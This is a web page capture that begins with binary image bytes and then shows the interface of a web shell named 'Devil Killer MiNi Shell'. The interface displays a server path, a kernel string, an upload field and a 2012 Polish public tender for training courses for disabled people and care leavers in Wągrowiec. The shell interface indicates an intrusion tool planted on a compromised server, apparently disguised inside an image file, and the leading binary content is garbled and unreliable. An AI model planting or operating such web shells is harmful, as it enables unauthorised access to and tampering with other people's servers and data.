JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/353346-N-2012.html

<p class="kh_header"><b>Wągrowiec: Zorganizowanie i przeprowadzenie szkoleń grupowych</b><br>
<b>Numer ogłoszenia: 353346 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Wierzbowa 1, 62-100 Wągrowiec, woj. wielkopolskie, tel. 67 26 27 614, faks 67 26 27 614.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wagrowiec.pl    www.pcpr.wagrowiec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń grupowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń grupowych  dla uczestników,uczestniczek  projektu  pn.  Rozwój i upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc osobom usamodzielnianym współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji,  Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, w ramach  zadania  publicznego w zakresie działalności na rzecz integracji  integracji zawodowej i społecznej osób zagrożonych wykluczeniem społecznym.
Oznaczenie wg Wspólnego Słownika Zamówień: 
80.53.00.00-8
1.Wykonawca jest zobowiązany do ubezpieczenia uczestników, uczestniczek szkolenia od następstw nieszczęśliwych wypadków na czas trwania szkolenia.
2.Wraz z rozpoczęciem szkolenia, Wykonawca zobowiązany jest wyposażyć każdego uczestnika, uczestniczkę szkolenia w materiały dydaktyczne i biurowe tj notatnik,  długopis, niezbędne do realizacji programu szkolenia.
3.Wszelkie materiały dydaktyczne wydawane uczestnikom/uczestniczkom szkoleń winny zawierać logo EFS oraz informację o współfinansowaniu projektu. Logo EFS, treść  zamieszczonej informacji oraz dane personalne uczestników,uczestniczek szkolenia będą   uzgodnione z Zamawiającym. 
4.Wykonawcy dotyczą wyłącznie wymagania  dotyczące szkoleń współfinansowanych ze środków Unii Europejskiej.
5.Wykonawca jest zobowiązany do prowadzenia listy obecności oraz informowania 
Zamawiającego  o nieobecności na szkoleniu lub rezygnacji uczestnika,uczestniczki
szkolenia nie później niż w ciągu 2 dni od zaistnienia zdarzenia - pod rygorem   
odmowy przez Zamawiającego zapłaty za szkolenie tych osób.
6.  Wykonawca jest zobowiązany do przedłożenia Zamawiającemu listy obecności:
a)   za każdy miesiąc szkolenia do 3 dnia roboczego następnego miesiąca, lub;
b)   w przypadku szkolenia trwającego krócej niż miesiąc do końca miesiąca, 
w którym odbywało się szkolenie.
7. Wykonawca zobowiązany jest do zamieszczenia na zaświadczeniach o ukończeniu szkolenia logo EFS oraz informację o współfinansowaniu projektu pn. Rozwój i  upowszechnianie form aktywnej integracji wśród osób niepełnosprawnych i pomoc  osobom usamodzielnianym przez Unię Europejską z Europejskiego Funduszu  
Społecznego w  ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja Integracji  Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie, przy czym treść zamieszczonej informacji oraz dane personalne uczestników będą   uzgodnione z  Zamawiającym. W przypadku, gdy wzór zaświadczenia został określony w odrębnych przepisach prawa i nie można umieszczać na nich dodatkowych znaków i  informacji, Wykonawca wyda dodatkowo własne zaświadczenie  zawierające logo i wymienione wyżej informacje.
8. Wykonawca jest zobowiązany zapewnić warunki szkolenia zgodnie z przepisami 
bezpieczeństwa i higieny pracy oraz przeciwpożarowymi.
9. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia w trakcie realizacji umowy liczby osób objętych szkoleniem. W takim przypadku, Wykonawcy będzie przysługiwać wynagrodzenie za faktycznie przeszkoloną liczbę osób.
10. Po zakończeniu szkolenia Wykonawca jest zobowiązany do przekazania Zamawiającemu kopii certyfikatów lub zaświadczeń o ukończeniu szkolenia wraz z pokwitowaniem odbioru przez uczestniczkę, uczestnika szkolenia. 
11. Wykonawca  zobowiązany jest do przekazania Zamawiającemu kopii dziennika zajęć szkolenia.
12. W celu sprawdzenia efektywności szkolenia, Wykonawca po zakończeniu szkolenia zobowiązany jest do przeprowadzenia ankiety ewaluacyjnej wśród  
uczestników, uczestniczek szkolenia oraz przekazania Zamawiającemu kopii.
IV. ZAMÓWIENIA CZĘŚCIOWE
Zamawiający dopuszcza możliwość składania ofert częściowych (  przez ofertę częściową rozumie się zamówienie określone numerycznie w częściach od Nr 1 do Nr  7 w pkt. IV SIWZ)
Części zamówienia:
Część nr 1.: Kurs grafiki komputerowej - program Corell Draw, projektowanie stron www    
Celem kursu jest  nabycie wiedzy teoretycznej i praktycznych umiejętności na temat tworzenia i edycji prac graficznych, przygotowanie do dalszego kształcenia w kierunku grafika komputerowego. Nabycie wiedzy teoretycznej   i praktycznych umiejętności z zakresu konstruowania stron internetowych, rozbudowywania witryn internetowych. Program kursu  oraz  materiały dydaktyczne powinny być opracowane zgodnie z obowiązującymi w tym zakresie przepisami prawa oraz powinien uwzględniać  zagadnienia:
związane  z  grafiką komputerową CorellDraw  ( 25 h)  oraz  projektowaniem   stron www   ( 25h). 
Do uczestnictwa w kursie  zostało zakwalifikowanych  21 osób , w tym 12 osób niepełnosprawnych oraz 9-ioro usamodzielnianych wychowanków  rodzinnych                            i instytucjonalnych form pieczy zastępczej oraz placówek o których mowa w  ustawie  o pomocy społecznej. Przeprowadzenie kursu  w ramach   dwóch grup  liczących 12 i 9  osób. Wskazanym jest, aby szkolenie dla każdej grupy odbywało się w innym terminie.  Termin realizacji zamówienia: 15 października - 30 listopada 2012r. Liczba godzin kursu powinna obejmować minimum 50 godzin zegarowych dla każdego  uczestnika kursu.
Zajęcia powinny odbywać się: 
I grupa osoby niepełnosprawne: od poniedziałku do piątku w godz. od 16.00 do 20.00  
II grupa usamodzielniani wychowankowie:  od poniedziałku do środy w godz. od 1530 do 1930  oraz od soboty do niedzieli w godz. od 1000 do 1600
Dzienna liczba godzin kursu nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu:  siedziba Zamawiającego - ul. Wierzbowa  1 , miasto Wągrowiec                             ( sala szkoleniowa wraz z zapleczem zostanie udostępniona  nieodpłatnie) .  
Zamawiający  dopuszcza ewentualność  zmiany miejsca prowadzenia kursu, z zastrzeżeniem  zachowania identycznych warunków  dotyczących użyczenia  Sali szkoleniowej wraz z zapleczem)
Kurs powinien być zakończony egzaminem wewnętrznym, wydaniem  zaświadczenia 
o ukończeniu kursu i uzyskanych kwalifikacjach.
W ramach kwalifikowanych kosztów  Wykonawca jest zobowiązany  do: 
-zwrotu kosztów dojazdów 6 osobom spoza miasta Wągrowca, w ustalonej kwocie ryczałtowej 20 zł za 1 osobodzień obecności uczestnika na kursie;
-zapewnienia  napojów  (m.in. kawa, herbata, woda mineralna), wyrobów cukierniczych  jako poczęstunek oraz niezbędnych dla konsumpcji  jednorazowych naczyń 
Część nr 2: Kurs florystyczno-bukieciarski
Celem kursu jest nabycie wiedzy teoretycznej i umiejętności praktycznych niezbędnych  do podjęcia pracy w kwiaciarni, przygotowanie do dalszego kształcenia w dziedzinie  bukieciarstwa oraz  florystyki.
Program kursu  oraz materiały dydaktyczne  powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać zagadnienia związane  florystycznymi  zasadami  kompozycyjnymi-florystyką okolicznościową,  sztuką układania kwiatów w naczyniach,  dekoracją kwiatów doniczkowych, artystycznym  pakowaniem prezentów. 
Do uczestnictwa w kursie zostały zakwalifikowane  22 osoby, w tym 9 osób niepełnosprawnych oraz 13 usamodzielnianych wychowanków  rodzinnych                              i instytucjonalnych form pieczy zastępczej oraz placówek, o których w ustawie o pomocy społecznej. 
Przeprowadzenie kursu  w ramach   dwóch grup  liczących 9 i 13  osób.    
Termin realizacji zamówienia: 15 października - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 40 godzin zegarowych dla każdego  uczestnika kursu.
Zajęcia powinny odbywać się od poniedziałku do piątku w godz. od 1530 do 1930                                       z możliwością prowadzenia zajęć w systemie weekendowym od 1000 do 1600
Dzienna liczba godzin kursu nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu:  siedziba Zamawiającego - ul. Wierzbowa  1 , miasto Wągrowiec                             ( sala szkoleniowa wraz z zapleczem zostanie udostępniona  nieodpłatnie) .  
Kurs powinien być zakończony egzaminem wewnętrznym, wydaniem  zaświadczenia 
o ukończeniu szkolenia i uzyskanych kwalifikacjach.
W ramach kwalifikowanych kosztów  Wykonawca jest zobowiązany  do: 
-zwrotu kosztów dojazdów  15 osobom spoza miasta Wągrowca, w ustalonej kwocie ryczałtowej 20 zł za 1 osobodzień obecności uczestnika na kursie;
-zapewnienia  napojów (m.in. kawa, herbata, woda mineralna), wyrobów cukierniczych  jako poczęstunek oraz niezbędnych dla konsumpcji  jednorazowych naczyń 
Część nr 3.:  Kurs obsługi piły motorowej 
Celem kursu  jest  nabycie i opanowanie przez uczestników wiedzy i podstawowych umiejętności z zakresu obsługi i eksploatacji piły motorowej  oraz podstawowych technik pracy. Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa oraz uwzględniać zagadnienia związane  z technikami pracy. 
Do uczestnictwa w kursie  zostało zakwalifikowanych  8 osób ( w tym 7 osób niepełnosprawnych) .
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min.16 godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się systemie weekendowym  od 1000 do 1500, z tym,                                 że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 6 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę, z zastrzeżeniem  organizacji dowozu i odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież i obuwie robocze.
Koszty niezbędnych badań  lekarskich osób zakwalifikowanych do uczestnictwa w kursie obsługi piły motorowej pokrywane są przez  Zamawiającego w ramach odrębnego zadania.
Część nr 4.: Kurs palacza CO
Celem kursu jest uzyskanie uprawnień   palacza pieców CO - w zakresie obsługi kotłów wodnych i parowych na paliwa stałe, ciekłe i gazowe. 
Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia związane dozorem technicznym, obowiązkami  palacza pieców CO, eksploatacją kotłów, przemysłowymi  urządzenia pary i gorącej wody, zasadami BHP przy urządzeniach cieplnych i na stanowisku palacza CO oraz ochroną  p.poż,  
 Do uczestnictwa  w kursie  zostało zakwalifikowanych  6 osób niepełnosprawnych.
Termin realizacji zamówienia: 15 października 2012r. - 14 grudnia 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min. 20  godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się systemie weekendowym od 10.00 do 15.00, z tym,                                 że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 6 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę,  z zastrzeżeniem  organizacji dowozu i odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież i obuwie robocze.
Koszty niezbędnych badań  lekarskich osób zakwalifikowanych do uczestnictwa w kursie palacza co pokrywane są przez  Zamawiającego w ramach odrębnego zadania.
Część nr 5.: Kurs krawiectwa lekkiego  
Celem kursu jest zapoznanie z podstawowymi wiadomościami i techniką krawiecką, nabycie podstawowej wiedzy z zakresu krawiectwa lekkiego, praktycznych umiejętności z zakresu kroju i szycia. Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie  z  obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia technologii krawiectwa, materiałoznawstwa, kroju  i modelowania.  
Do uczestnictwa w kursie zostały zakwalifikowane  3 osoby niepełnosprawne.
Termin realizacji zamówienia: 15 października 2012 r. - 14 grudnia 2012r.
Liczba godzin zajęć dydaktycznych oraz  praktycznych ramach   kursu powinna  wynosić min. 40  godzin zegarowych na każdego  uczestnika kursu.
Zajęcia powinny odbywać się od poniedziałku do piątku w godz. od 1600 do 1900 ,                                      z możliwością prowadzenia zajęć w systemie weekendowym od 1000 do 1500
 z tym, że jednorazowa  ilość zajęć  w ramach kursu  nie może przekroczyć 8 godzin zegarowych.
Miejsce kursu: miasto Wągrowiec lub inna miejscowość wskazana przez Wykonawcę, z zastrzeżeniem  organizacji dowozu i  odwozu uczestników kursu z  i do miasta Wągrowca.
Kurs powinien  być zakończony egzaminem wewnętrznym, wydaniem zaświadczenia 
o ukończeniu i uzyskanych kwalifikacjach.
Wykonawca zapewni uczestnikom kursu odzież roboczą.
Część nr 6.:  Kurs komputerowy - podstawy MS Office  - zakup vouchera 
Celem kursu jest nabycie umiejętności, które pozwalają na samodzielne posługiwanie się programami pakietu MS Office,  program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie   z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać 
zagadnienia: MS WORD XP, MS EXCEL XP, MS ACCESS XP, MS POWER POINT XP, MS OUTLOOK XP
Voucher zostanie zakupiony dla jednej osoby niepełnosprawnej. 
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 40 godzin  zegarowych  i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych.  
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
Miejsce realizacji kursu: miasto Wągrowiec,  pomieszczenia dostępne  dla osoby z dysfunkcją narządu ruchu. 
Kurs powinien być zakończony egzaminem wewnętrznym oraz  wydaniem  zaświadczenia.
Część nr 7.: Kurs podstawowy języka francuskiego  - zakup vouchera
Celem kursu jest nabycie umiejętności praktycznego posługiwania się językiem francuskim,  
Program kursu oraz materiały dydaktyczne powinny być opracowane zgodnie                         
z obowiązującymi w tym zakresie przepisami prawa  oraz uwzględniać zagadnienia:
sytuacji i rozmów codziennych, rozkład dnia, nazwy liter, kolory, dni, miesiące, pory roku pytania, prośby, przeprosiny, odmowy, ja i moi bliscy, rodzina, przyjaciele, przedstawianie się , dom, mieszkanie, opis przedmiotów w domu, w pracy, praca, umawianie spotkań miasto, wieś, komunikacja publiczna - środki transportu, zachowanie na ulicy - pytanie o drogę, zakupy, bar, kawiarnia, kino, teatr, muzyka
Voucher zostanie zakupiony dla jednej osoby niepełnosprawnej. 
Termin realizacji zamówienia: 15 października 2012r. - 30 listopada 2012r.
Liczba godzin kursu powinna obejmować minimum 80 godzin  zegarowych  i powinna zawierać zakres wiadomości teoretycznych i umiejętności praktycznych.  
Dzienna liczba godzin szkolenia nie może przekroczyć 8 godzin zegarowych.
Miejsce realizacji kursu: miasto Wągrowiec,  pomieszczenia dostępne  dla osoby z dysfunkcją narządu ruchu. 
Kurs powinien być zakończony egzaminem wewnętrznym oraz  wydaniem  zaświadczenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie pobiera wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> tak</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż posiada wpis do rejestru instytucji szkoleniowych wydany przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej, zgodnie z art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy t.j. Dz. U. 2008r., Nr 69, poz. 415 z późn. zm.), rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 236, poz. 2365), Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 15 grudnia 2010r. zmieniającym rozporządzenie w sprawie rejestru instytucji szkoleniowych (Dz. U. Nr 241, poz. 1620) oraz dokument, że wpis został zaktualizowany na 2012 rok</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że przeprowadził co najmniej jedno szkolenie, kurs grupowe w zakresie przedmiotu zamówienia w okresie ostatnich trzech lat, przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie o tematyce tożsamej z przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż na czas realizacji zamówienia będzie dysponował urządzeniami umożliwiającymi realizację szkolenia, kursu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga dysponowania co najmniej jedną osobą posiadającą adekwatne do zakresu szkolenia, kursu wykształcenie, kwalifikacje, doświadczenie zawodowe.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku zostanie dokonana na podstawie dokumentów załączonych do oferty zgodnie ze specyfikacją SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
